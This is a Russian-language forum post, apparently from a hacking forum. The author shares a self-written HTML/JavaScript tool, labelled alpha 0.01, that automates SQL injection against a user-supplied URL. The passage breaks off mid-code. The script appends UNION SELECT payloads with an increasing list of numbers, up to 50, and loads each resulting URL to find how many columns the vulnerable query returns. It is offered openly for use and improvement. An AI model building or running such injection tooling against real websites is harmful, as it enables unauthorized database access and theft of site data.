Вот написал для себя (за пару часов) небольшой скриптик автоматизации sql-inj для определения колличества колонок. Я конечно понимаю, что дорабатывать его можно очень много, поэтому прошу строго не судить, тем более на javascript я кодер никакой
Цитата:
(выделил специально для inv, чтоб не стебался понапрасну. прим. автора)
, а предлагать усовершенствования и показать недостатки т.п. Главное он пашет!
Итак версия alpha 0.01
PHP код:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title>Подборщик колличества столбцов</title>
</head>
<script>
var url="http://";
var tek_url=url;
var s="";
var n=0;
function poisk(f) {
tek_url=document.search.url.value;
document.search.colum.value="?";
document.search.tek_url.value=document.search.url.value+"-1+union+select+";
tek_url=document.search.url.value+"-1+union+select+";
while (n<50)
{
n++;
if (n==1) {s=s+n;}
else {s=s+","+n;}
tek_url=tek_url+s+"/*";
document.search.tek_url.value=tek_url;
document.search.colum.value=n;
changePage(tek_url);
pause ();